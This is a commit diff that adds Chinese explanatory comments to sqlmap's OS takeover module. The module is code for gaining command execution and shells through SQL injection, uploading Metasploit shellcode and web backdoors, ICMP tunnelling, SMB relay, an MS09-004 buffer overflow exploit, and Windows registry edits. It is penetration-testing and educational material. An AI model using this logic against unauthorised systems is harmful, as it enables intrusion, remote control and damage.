
Warmlight 2 months ago
parent 33e0bdbbec
commit b7c07b97f7

@ -5,234 +5,262 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
import os
from lib.core.common import Backend
from lib.core.common import getSafeExString
from lib.core.common import isDigit
from lib.core.common import isStackingAvailable
from lib.core.common import openFile
from lib.core.common import readInput
from lib.core.common import runningAsAdmin
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import SqlmapSystemException
from lib.core.exception import SqlmapUndefinedMethod
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.takeover.abstraction import Abstraction
from lib.takeover.icmpsh import ICMPsh
from lib.takeover.metasploit import Metasploit
from lib.takeover.registry import Registry
import os # 导入os模块提供与操作系统交互的功能
from lib.core.common import Backend # 导入Backend类用于获取后端数据库信息
from lib.core.common import getSafeExString # 导入getSafeExString函数用于获取安全的异常字符串
from lib.core.common import isDigit # 导入isDigit函数用于判断字符串是否为数字
from lib.core.common import isStackingAvailable # 导入isStackingAvailable函数用于判断是否支持堆叠查询
from lib.core.common import openFile # 导入openFile函数用于安全地打开文件
from lib.core.common import readInput # 导入readInput函数用于安全地读取用户输入
from lib.core.common import runningAsAdmin # 导入runningAsAdmin函数用于判断是否以管理员身份运行
from lib.core.data import conf # 导入conf对象存储全局配置信息
from lib.core.data import kb # 导入kb对象存储全局知识库信息
from lib.core.data import logger # 导入logger对象用于记录日志
from lib.core.enums import DBMS # 导入DBMS枚举类定义数据库类型
from lib.core.enums import OS # 导入OS枚举类定义操作系统类型
from lib.core.exception import SqlmapFilePathException # 导入SqlmapFilePathException异常类表示文件路径错误
from lib.core.exception import SqlmapMissingDependence # 导入SqlmapMissingDependence异常类表示缺少依赖
from lib.core.exception import SqlmapMissingMandatoryOptionException # 导入SqlmapMissingMandatoryOptionException异常类表示缺少必要选项
from lib.core.exception import SqlmapMissingPrivileges # 导入SqlmapMissingPrivileges异常类表示缺少权限
from lib.core.exception import SqlmapNotVulnerableException # 导入SqlmapNotVulnerableException异常类表示目标不漏洞
from lib.core.exception import SqlmapSystemException # 导入SqlmapSystemException异常类表示系统错误
from lib.core.exception import SqlmapUndefinedMethod # 导入SqlmapUndefinedMethod异常类表示未定义的方法
from lib.core.exception import SqlmapUnsupportedDBMSException # 导入SqlmapUnsupportedDBMSException异常类表示不支持的数据库类型
from lib.takeover.abstraction import Abstraction # 导入Abstraction类用于定义抽象的接管功能
from lib.takeover.icmpsh import ICMPsh # 导入ICMPsh类用于定义ICMP隧道功能
from lib.takeover.metasploit import Metasploit # 导入Metasploit类用于定义Metasploit接管功能
from lib.takeover.registry import Registry # 导入Registry类用于定义注册表操作功能
class Takeover(Abstraction, Metasploit, ICMPsh, Registry):
This class defines generic OS takeover functionalities for plugins.
def __init__(self):
self.cmdTblName = ("%soutput" % conf.tablePrefix)
self.tblField = "data"
# 初始化命令输出表名称和字段名称
self.cmdTblName = ("%soutput" % conf.tablePrefix) # 命令输出表名,使用配置中的表前缀
self.tblField = "data" # 表字段名,存储命令输出数据
Abstraction.__init__(self) # 初始化Abstraction基类
def osCmd(self):
Executes a single operating system command.
# 判断是否可以通过堆叠查询或直接连接执行系统命令
if isStackingAvailable() or conf.direct:
web = False
web = False # 如果支持堆叠查询或直接连接则不使用Web后门
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command execution"
web = True
web = True # 如果不支持堆叠查询且是MySQL数据库则使用Web后门
errMsg = "unable to execute operating system commands via "
errMsg += "the back-end DBMS"
raise SqlmapNotVulnerableException(errMsg)
raise SqlmapNotVulnerableException(errMsg) # 否则抛出异常,表示无法通过后端数据库执行系统命令
self.getRemoteTempPath() # 获取远程临时路径
self.initEnv(web=web) # 初始化环境
# 如果不使用Web后门或者使用Web后门但URL存在则执行命令
if not web or (web and self.webBackdoorUrl is not None):
self.runCmd(conf.osCmd) # 执行配置中的系统命令
# 如果不开启操作系统shell或pwn并且没有清理需求则进行清理
if not conf.osShell and not conf.osPwn and not conf.cleanup:
self.cleanup(web=web) # 清理环境
def osShell(self):
Prompts for an interactive operating system shell.
# 判断是否可以通过堆叠查询或直接连接执行shell
if isStackingAvailable() or conf.direct:
web = False
web = False # 如果支持堆叠查询或直接连接则不使用Web后门
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command prompt"
web = True
web = True # 如果不支持堆叠查询且是MySQL数据库则使用Web后门
errMsg = "unable to prompt for an interactive operating "
errMsg += "system shell via the back-end DBMS because "
errMsg += "stacked queries SQL injection is not supported"
raise SqlmapNotVulnerableException(errMsg)
raise SqlmapNotVulnerableException(errMsg) # 否则抛出异常表示无法通过后端数据库获取交互式shell
self.getRemoteTempPath() # 获取远程临时路径
except SqlmapFilePathException:
self.initEnv(web=web) # 初始化环境
except SqlmapFilePathException: # 如果初始化环境出现文件路径异常
if not web and not conf.direct:
infoMsg = "falling back to web backdoor method..."
web = True
kb.udfFail = True
web = True # 回退到使用Web后门
kb.udfFail = True # 设置UDF失败标记
self.initEnv(web=web) # 重新初始化环境使用Web后门
raise # 如果不能回退到Web后门则抛出异常
# 如果不使用Web后门或者使用Web后门但URL存在则进入shell
if not web or (web and self.webBackdoorUrl is not None):
self.shell() # 进入shell
# 如果不开启操作系统pwn并且没有清理需求则进行清理
if not conf.osPwn and not conf.cleanup:
self.cleanup(web=web) # 清理环境
def osPwn(self):
goUdf = False
fallbackToWeb = False
setupSuccess = False
Attempts to gain an out-of-band session via Metasploit or ICMP.
goUdf = False # 是否使用UDF执行
fallbackToWeb = False # 是否回退到Web后门
setupSuccess = False # 是否设置成功
self.checkDbmsOs() # 检查数据库服务器操作系统
if Backend.isOs(OS.WINDOWS):
if Backend.isOs(OS.WINDOWS): # 如果操作系统是Windows
msg = "how do you want to establish the tunnel?"
msg += "\n[1] TCP: Metasploit Framework (default)"
msg += "\n[2] ICMP: icmpsh - ICMP tunneling"
msg += "\
[1] TCP: Metasploit Framework (default)"
msg += "\
[2] ICMP: icmpsh - ICMP tunneling"
while True:
tunnel = readInput(msg, default='1')
tunnel = readInput(msg, default='1') # 读取用户选择的隧道类型
if isDigit(tunnel) and int(tunnel) in (1, 2):
tunnel = int(tunnel)
tunnel = int(tunnel) # 将用户输入转换为整数
warnMsg = "invalid value, valid values are '1' and '2'"
logger.warning(warnMsg) # 如果输入无效,则给出警告
tunnel = 1
tunnel = 1 # 如果不是Windows系统则默认使用TCP隧道
debugMsg = "the tunnel can be established only via TCP when "
debugMsg += "the back-end DBMS is not Windows"
if tunnel == 2:
isAdmin = runningAsAdmin()
if tunnel == 2: # 如果选择ICMP隧道
isAdmin = runningAsAdmin() # 判断是否以管理员身份运行
if not isAdmin:
errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to establish an out-of-band ICMP "
errMsg += "tunnel because icmpsh uses raw sockets to "
errMsg += "sniff and craft ICMP packets"
raise SqlmapMissingPrivileges(errMsg)
raise SqlmapMissingPrivileges(errMsg) # 如果不是以管理员身份运行,则抛出异常,表示缺少权限
__import__("impacket") # 尝试导入impacket库
except ImportError:
errMsg = "sqlmap requires 'python-impacket' third-party library "
errMsg += "in order to run icmpsh master. You can get it at "
errMsg += "https://github.com/SecureAuthCorp/impacket"
raise SqlmapMissingDependence(errMsg)
raise SqlmapMissingDependence(errMsg) # 如果缺少impacket库则抛出异常表示缺少依赖
filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all"
filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all" # ICMP回显忽略文件路径
if os.path.exists(filename):
with openFile(filename, "wb") as f:
f.write("1") # 禁用ICMP回显
except IOError as ex:
errMsg = "there has been a file opening/writing error "
errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex))
raise SqlmapSystemException(errMsg)
raise SqlmapSystemException(errMsg) # 如果文件打开/写入错误,则抛出异常
errMsg = "you need to disable ICMP replies by your machine "
errMsg += "system-wide. For example run on Linux/Unix:\n"
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
errMsg += "system-wide. For example run on Linux/Unix:\
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\
errMsg += "If you miss doing that, you will receive "
errMsg += "information from the database server and it "
errMsg += "is unlikely to receive commands sent from you"
logger.error(errMsg) # 如果文件不存在,给出错误提示
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
self.sysUdfs.pop("sys_bineval") # 如果是MySQL或PostgreSQL移除sys_bineval UDF
self.getRemoteTempPath() # 获取远程临时路径
# 判断是否可以通过堆叠查询或直接连接执行
if isStackingAvailable() or conf.direct:
web = False
web = False # 如果支持堆叠查询或直接连接则不使用Web后门
self.initEnv(web=web) # 初始化环境
if tunnel == 1:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
if tunnel == 1: # 如果选择TCP隧道
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): # 如果是MySQL或PostgreSQL
msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\n[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)"
msg += "\
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\
[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)"
while True:
choice = readInput(msg, default='1')
choice = readInput(msg, default='1') # 读取用户选择的执行方式
if isDigit(choice) and int(choice) in (1, 2):
choice = int(choice)
choice = int(choice) # 将用户输入转换为整数
warnMsg = "invalid value, valid values are '1' and '2'"
logger.warning(warnMsg) # 如果输入无效,则给出警告
if choice == 1:
goUdf = True
goUdf = True # 如果选择使用UDF则设置标记
if goUdf:
exitfunc = "thread"
setupSuccess = True
exitfunc = "thread" # 如果使用UDF则设置退出函数为线程
setupSuccess = True # 设置成功
exitfunc = "process"
exitfunc = "process" # 如果不使用UDF则设置退出函数为进程
self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") # 创建Metasploit shellcode
if not goUdf:
setupSuccess = self.uploadShellcodeexec(web=web)
setupSuccess = self.uploadShellcodeexec(web=web) # 上传shellcodeexec程序
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
fallbackToWeb = True # 如果上传失败且是MySQL数据库则回退到Web后门
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
raise SqlmapFilePathException(msg) # 否则抛出异常,表示无法执行操作系统接管
if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc:
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg) # 如果是Windows上的MySQL且开启了提权给出调试信息
elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web)
elif tunnel == 2: # 如果选择ICMP隧道
setupSuccess = self.uploadIcmpshSlave(web=web) # 上传icmpsh slave程序
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
fallbackToWeb = True # 如果上传失败且是MySQL数据库则回退到Web后门
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
raise SqlmapFilePathException(msg) # 否则抛出异常,表示无法执行操作系统接管
# 如果设置不成功且是MySQL数据库且不是直接连接且不支持堆叠查询或回退到Web后门则使用Web后门
if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb):
web = True
web = True # 设置使用Web后门
if fallbackToWeb:
infoMsg = "falling back to web backdoor to establish the tunnel"
@ -240,242 +268,270 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry):
infoMsg = "going to use a web backdoor to establish the tunnel"
self.initEnv(web=web, forceInit=fallbackToWeb)
self.initEnv(web=web, forceInit=fallbackToWeb) # 初始化环境,强制初始化
if self.webBackdoorUrl:
if not Backend.isOs(OS.WINDOWS) and conf.privEsc:
# Unset --priv-esc if the back-end DBMS underlying operating
# system is not Windows
conf.privEsc = False
conf.privEsc = False # 如果不是Windows系统且开启了提权则关闭提权
warnMsg = "sqlmap does not implement any operating system "
warnMsg += "user privilege escalation technique when the "
warnMsg += "back-end DBMS underlying system is not Windows"
logger.warning(warnMsg) # 给出警告
if tunnel == 1:
self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
setupSuccess = self.uploadShellcodeexec(web=web)
self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") # 创建Metasploit shellcode
setupSuccess = self.uploadShellcodeexec(web=web) # 上传shellcodeexec程序
if setupSuccess is not True:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
raise SqlmapFilePathException(msg) # 如果上传失败,则抛出异常
elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web)
setupSuccess = self.uploadIcmpshSlave(web=web) # 上传icmpsh slave程序
if setupSuccess is not True:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
raise SqlmapFilePathException(msg) # 如果上传失败,则抛出异常
if setupSuccess:
if tunnel == 1:
self.pwn(goUdf) # 如果是TCP隧道则执行pwn
elif tunnel == 2:
self.icmpPwn() # 如果是ICMP隧道则执行icmpPwn
errMsg = "unable to prompt for an out-of-band session"
raise SqlmapNotVulnerableException(errMsg)
raise SqlmapNotVulnerableException(errMsg) # 如果设置失败,则抛出异常
if not conf.cleanup:
self.cleanup(web=web) # 如果没有清理需求,则进行清理
def osSmb(self):
Performs a SMB relay attack.
self.checkDbmsOs() # 检查数据库服务器操作系统
if not Backend.isOs(OS.WINDOWS):
errMsg = "the back-end DBMS underlying operating system is "
errMsg += "not Windows: it is not possible to perform the SMB "
errMsg += "relay attack"
raise SqlmapUnsupportedDBMSException(errMsg)
raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是Windows系统则抛出异常表示不支持SMB中继攻击
if not isStackingAvailable() and not conf.direct:
if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL):
errMsg = "on this back-end DBMS it is only possible to "
errMsg += "perform the SMB relay attack if stacked "
errMsg += "queries are supported"
raise SqlmapUnsupportedDBMSException(errMsg)
raise SqlmapUnsupportedDBMSException(errMsg) # 如果是PostgreSQL或MSSQL且不支持堆叠查询则抛出异常
elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "since stacked queries are not supported, "
debugMsg += "sqlmap is going to perform the SMB relay "
debugMsg += "attack via inference blind SQL injection"
logger.debug(debugMsg) # 如果是MySQL且不支持堆叠查询则使用盲注进行SMB中继攻击
printWarn = True
printWarn = True # 是否打印警告
warnMsg = "it is unlikely that this attack will be successful "
if Backend.isDbms(DBMS.MYSQL):
warnMsg += "because by default MySQL on Windows runs as "
warnMsg += "Local System which is not a real user, it does "
warnMsg += "not send the NTLM session hash when connecting to "
warnMsg += "a SMB service"
warnMsg += "a SMB service" # 如果是MySQL给出警告
elif Backend.isDbms(DBMS.PGSQL):
warnMsg += "because by default PostgreSQL on Windows runs "
warnMsg += "as postgres user which is a real user of the "
warnMsg += "system, but not within the Administrators group"
warnMsg += "system, but not within the Administrators group" # 如果是PostgreSQL给出警告
elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion()
warnMsg += "runs as Network Service which is not a real user, "
warnMsg += "it does not send the NTLM session hash when "
warnMsg += "connecting to a SMB service"
warnMsg += "connecting to a SMB service" # 如果是MSSQL给出警告
printWarn = False
printWarn = False # 如果不是上述情况,则不打印警告
if printWarn:
logger.warning(warnMsg) # 打印警告信息
self.smb() # 执行SMB中继攻击
def osBof(self):
Exploits a buffer overflow vulnerability in the 'sp_replwritetovarbin' stored procedure (MS09-004)
利用 'sp_replwritetovarbin' 存储过程中的缓冲区溢出漏洞 (MS09-004)
if not isStackingAvailable() and not conf.direct:
return # 如果不支持堆叠查询或不是直接连接,则返回
if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")):
errMsg = "the back-end DBMS must be Microsoft SQL Server "
errMsg += "2000 or 2005 to be able to exploit the heap-based "
errMsg += "buffer overflow in the 'sp_replwritetovarbin' "
errMsg += "stored procedure (MS09-004)"
raise SqlmapUnsupportedDBMSException(errMsg)
raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是MSSQL 2000或2005则抛出异常表示不支持此漏洞
infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion()
infoMsg += "'sp_replwritetovarbin' stored procedure heap-based "
infoMsg += "buffer overflow (MS09-004)"
logger.info(infoMsg) # 打印漏洞利用信息
msg = "this technique is likely to DoS the DBMS process, are you "
msg += "sure that you want to carry with the exploit? [y/N] "
msg += "sure that you want to carry with the exploit? [y/N] " # 提示是否继续
if readInput(msg, default='N', boolean=True):
self.initEnv(mandatory=False, detailed=True)
self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True)
self.initEnv(mandatory=False, detailed=True) # 初始化环境,不强制,但详细
self.getRemoteTempPath() # 获取远程临时路径
self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) # 创建Metasploit shellcode使用SEH退出函数
self.bof() # 执行缓冲区溢出攻击
def uncPathRequest(self):
Initiates a UNC path request.
errMsg = "'uncPathRequest' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
raise SqlmapUndefinedMethod(errMsg) # 抛出异常表示未在具体DBMS插件中定义此方法
def _regInit(self):
Initializes registry operation.
if not isStackingAvailable() and not conf.direct:
return # 如果不支持堆叠查询或不是直接连接,则返回
self.checkDbmsOs() # 检查数据库服务器操作系统
if not Backend.isOs(OS.WINDOWS):
errMsg = "the back-end DBMS underlying operating system is "
errMsg += "not Windows"
raise SqlmapUnsupportedDBMSException(errMsg)
raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是Windows系统则抛出异常
self.initEnv() # 初始化环境
self.getRemoteTempPath() # 获取远程临时路径
def regRead(self):
Reads a value from the Windows registry.
self._regInit() # 初始化注册表操作
if not conf.regKey:
default = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
msg = "which registry key do you want to read? [%s] " % default
regKey = readInput(msg, default=default)
regKey = readInput(msg, default=default) # 读取用户输入的注册表键,默认使用指定路径
regKey = conf.regKey
regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
if not conf.regVal:
default = "ProductName"
msg = "which registry key value do you want to read? [%s] " % default
regVal = readInput(msg, default=default)
regVal = readInput(msg, default=default) # 读取用户输入的注册表值默认使用ProductName
regVal = conf.regVal
regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal)
logger.info(infoMsg) # 打印读取注册表路径信息
return self.readRegKey(regKey, regVal, True)
return self.readRegKey(regKey, regVal, True) # 读取注册表键值,并返回结果
def regAdd(self):
Adds a value to the Windows registry.
self._regInit() # 初始化注册表操作
errMsg = "missing mandatory option"
errMsg = "missing mandatory option" # 缺少必要参数的错误信息
if not conf.regKey:
msg = "which registry key do you want to write? "
regKey = readInput(msg)
regKey = readInput(msg) # 读取用户输入的注册表键
if not regKey:
raise SqlmapMissingMandatoryOptionException(errMsg)
raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
regKey = conf.regKey
regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
if not conf.regVal:
msg = "which registry key value do you want to write? "
regVal = readInput(msg)
regVal = readInput(msg) # 读取用户输入的注册表值
if not regVal:
raise SqlmapMissingMandatoryOptionException(errMsg)
raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
regVal = conf.regVal
regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
if not conf.regData:
msg = "which registry key value data do you want to write? "
regData = readInput(msg)
regData = readInput(msg) # 读取用户输入的注册表数据
if not regData:
raise SqlmapMissingMandatoryOptionException(errMsg)
raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
regData = conf.regData
regData = conf.regData # 如果配置中指定了注册表数据,则使用配置
if not conf.regType:
default = "REG_SZ"
msg = "which registry key value data-type is it? "
msg += "[%s] " % default
regType = readInput(msg, default=default)
regType = readInput(msg, default=default) # 读取用户输入的注册表类型默认使用REG_SZ
regType = conf.regType
regType = conf.regType # 如果配置中指定了注册表类型,则使用配置
infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal)
infoMsg += "with data '%s'. " % regData
infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry."
logger.info(infoMsg) # 打印添加注册表信息
self.addRegKey(regKey, regVal, regType, regData)
self.addRegKey(regKey, regVal, regType, regData) # 添加注册表键值
def regDel(self):
Deletes a value from the Windows registry.
self._regInit() # 初始化注册表操作
errMsg = "missing mandatory option"
errMsg = "missing mandatory option" # 缺少必要参数的错误信息
if not conf.regKey:
msg = "which registry key do you want to delete? "
regKey = readInput(msg)
regKey = readInput(msg) # 读取用户输入的注册表键
if not regKey:
raise SqlmapMissingMandatoryOptionException(errMsg)
raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
regKey = conf.regKey
regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
if not conf.regVal:
msg = "which registry key value do you want to delete? "
regVal = readInput(msg)
regVal = readInput(msg) # 读取用户输入的注册表值
if not regVal:
raise SqlmapMissingMandatoryOptionException(errMsg)
raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
regVal = conf.regVal
regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
message = "are you sure that you want to delete the Windows "
message += "registry path '%s\\%s? [y/N] " % (regKey, regVal)
if not readInput(message, default='N', boolean=True):
return # 如果用户选择不删除,则返回
infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal)
infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry."
logger.info(infoMsg) # 打印删除注册表信息
self.delRegKey(regKey, regVal)
self.delRegKey(regKey, regVal) # 删除注册表键值